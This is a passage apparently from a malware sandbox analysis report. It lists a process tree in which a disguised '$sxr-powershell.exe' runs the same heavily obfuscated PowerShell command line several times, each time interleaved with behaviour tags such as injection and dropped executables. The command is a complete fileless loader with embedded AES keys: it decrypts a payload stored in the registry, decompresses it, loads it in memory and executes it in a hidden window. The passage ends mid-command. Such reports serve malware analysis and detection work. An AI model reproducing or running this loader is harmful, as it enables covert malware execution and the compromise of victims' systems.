        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3536).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3512
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3536" "2952" "2872" "2956" "0" "0" "2960" "0" "0" "0" "0" "0"
        10⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6716
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6048).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of SetThreadContext
        
        PID:5424
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6048" "2944" "2876" "2948" "0" "0" "2952" "0" "0" "0" "0" "0"
        9⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2392
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1352).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5420
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1352).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = 